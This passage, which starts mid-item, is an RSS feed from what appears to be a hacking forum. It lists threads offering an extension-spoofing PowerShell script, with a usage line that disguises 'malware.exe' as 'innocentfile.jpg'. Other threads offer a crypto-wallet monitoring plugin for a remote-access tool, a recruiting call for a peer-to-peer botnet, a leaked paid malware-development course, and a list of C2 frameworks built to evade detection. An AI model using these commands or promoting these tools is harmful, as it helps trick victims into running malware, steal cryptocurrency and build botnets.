<div style="text-align: center;" class="mycode_align"><img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fi.ibb.co%2FXfqqTTYm%2FScreenshot-2026-01-12-162542.png" loading="lazy"  alt="[Image: Screenshot-2026-01-12-162542.png]" class="mycode_img" /></div>
<div style="text-align: center;" class="mycode_align">‎ ‎ </div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ffffff;" class="mycode_color">Example video:</span></div>
<div style="text-align: center;" class="mycode_align"><a href="https://sendvid.com/ml86udlc" target="_blank" rel="noopener" class="mycode_url">https://sendvid.com/ml86udlc</a></div>
<div style="text-align: center;" class="mycode_align">‎ </div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ffffff;" class="mycode_color">Use command:</span></div>
<div style="text-align: center;" class="mycode_align"><div class="codeblock"><div class="body" dir="ltr"><code>.&#92;extspooferps.ps1 -FilePath .&#92;malware.exe -NewBasename "innocentfile.jpg" -NewExtension "exe"</code></div></div></div>
<div style="text-align: center;" class="mycode_align">‎ ‎ </div>
<div style="text-align: center;" class="mycode_align"><span style="color: #ffffff;" class="mycode_color">Script:</span></div>
<div style="text-align: center;" class="mycode_align"><div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Crypto Monitor 1.0.0]]></title>
			<link>https://pwnforums.st/Thread-Crypto-Monitor-1-0-0</link>
			<pubDate>Sun, 11 Jan 2026 15:21:58 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=430478">nullvex</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Crypto-Monitor-1-0-0</guid>
			<description><![CDATA[Crypto Monitor Plugin for pulsar v2.4.5<br />
<br />
An advanced process monitoring solution for Crypto Wallets,<br />
enhancing the capabilities for pulsar v2.4.5<br />
<br />
monitored wallets:<br />
 - exodus<br />
 - ledger live<br />
 - trezor suite<br />
 - guarda<br />
 - coinbase wallet<br />
 - metamask<br />
<br />
created by <dvz_me_placeholder id="0" /><br />
<br />
<hr class="mycode_hr" />
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[Crypto Monitor Plugin for pulsar v2.4.5<br />
<br />
An advanced process monitoring solution for Crypto Wallets,<br />
enhancing the capabilities for pulsar v2.4.5<br />
<br />
monitored wallets:<br />
 - exodus<br />
 - ledger live<br />
 - trezor suite<br />
 - guarda<br />
 - coinbase wallet<br />
 - metamask<br />
<br />
created by <dvz_me_placeholder id="0" /><br />
<br />
<hr class="mycode_hr" />
<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Botnet peer to peer]]></title>
			<link>https://pwnforums.st/Thread-Botnet-peer-to-peer</link>
			<pubDate>Sat, 03 Jan 2026 23:31:15 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=699233">hivenet</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Botnet-peer-to-peer</guid>
			<description><![CDATA[I am a c++ developer with about 7 years of experience in coding, windows and assembly. I have been developing a c++ p2p botnet that is divided in subnets in which admins handle the commands, all decentralized with cryptographic verification for verification of commands from public sources and with future command panel.<br />
I want to find people interested in helping me and extending my network.]]></description>
			<content:encoded><![CDATA[I am a c++ developer with about 7 years of experience in coding, windows and assembly. I have been developing a c++ p2p botnet that is divided in subnets in which admins handle the commands, all decentralized with cryptographic verification for verification of commands from public sources and with future command panel.<br />
I want to find people interested in helping me and extending my network.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Maldev Academy]]></title>
			<link>https://pwnforums.st/Thread-Maldev-Academy</link>
			<pubDate>Sat, 03 Jan 2026 13:50:21 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=698398">Shenron</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Maldev-Academy</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fmaldevacademy.com%2Fcss%2Fimages%2FMDA.png" loading="lazy"  alt="[Image: MDA.png]" class="mycode_img" /></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">Advanced Training for Cyber Security Professionals</span></div>
<div style="text-align: center;" class="mycode_align">Maldev Academy provides specialized, module-based security</div>
<div style="text-align: center;" class="mycode_align"> training and resources designed for cyber security professionals.</div>
<br />
<br />
Contains:<br />
- Full Course<br />
- VM Student<br />
- 128 modules*<br />
<br />
Preview:<br />
<div class="codeblock"><div class="body" dir="ltr"><code>https://p.vinci-concessions.com/?49110d4322f87763#48c232xg22NFcThgspYiuJiE6WNgYxyX9Vp7xCjN1TNz</code></div></div><br />
Download:<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<br />
*:<br />
- Modules folder contains the first ordered modules <br />
- Samples folder contains the new modules (at the leak time)<br />
<br />
Author: mr.d0x<br />
Source: _https://maldevacademy.com/]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fmaldevacademy.com%2Fcss%2Fimages%2FMDA.png" loading="lazy"  alt="[Image: MDA.png]" class="mycode_img" /></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">Advanced Training for Cyber Security Professionals</span></div>
<div style="text-align: center;" class="mycode_align">Maldev Academy provides specialized, module-based security</div>
<div style="text-align: center;" class="mycode_align"> training and resources designed for cyber security professionals.</div>
<br />
<br />
Contains:<br />
- Full Course<br />
- VM Student<br />
- 128 modules*<br />
<br />
Preview:<br />
<div class="codeblock"><div class="body" dir="ltr"><code>https://p.vinci-concessions.com/?49110d4322f87763#48c232xg22NFcThgspYiuJiE6WNgYxyX9Vp7xCjN1TNz</code></div></div><br />
Download:<br />
<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<br />
*:<br />
- Modules folder contains the first ordered modules <br />
- Samples folder contains the new modules (at the leak time)<br />
<br />
Author: mr.d0x<br />
Source: _https://maldevacademy.com/]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[LOLC2 - Collection of C2 Frameworks]]></title>
			<link>https://pwnforums.st/Thread-LOLC2-Collection-of-C2-Frameworks</link>
			<pubDate>Sat, 03 Jan 2026 11:58:49 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=698398">Shenron</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-LOLC2-Collection-of-C2-Frameworks</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Flolc2.github.io%2Flolc2.png" loading="lazy"  alt="[Image: lolc2.png]" class="mycode_img" /></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">LOLC2</span></div>
<div style="text-align: center;" class="mycode_align">collection of C2 frameworks that leverage legitimate services to evade detection</div>
<br />
<br />
I highly recommend it for RT/MalwrDev, very enriching and interesting from a technical point of view.<br />
<br />
_https://lolc2.github.io/<br />
_https://mthcht.medium.com/c2-hiding-in-plain-sight-7a83963b9344]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Flolc2.github.io%2Flolc2.png" loading="lazy"  alt="[Image: lolc2.png]" class="mycode_img" /></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">LOLC2</span></div>
<div style="text-align: center;" class="mycode_align">collection of C2 frameworks that leverage legitimate services to evade detection</div>
<br />
<br />
I highly recommend it for RT/MalwrDev, very enriching and interesting from a technical point of view.<br />
<br />
_https://lolc2.github.io/<br />
_https://mthcht.medium.com/c2-hiding-in-plain-sight-7a83963b9344]]></content:encoded>
		</item>
	</channel>
</rss>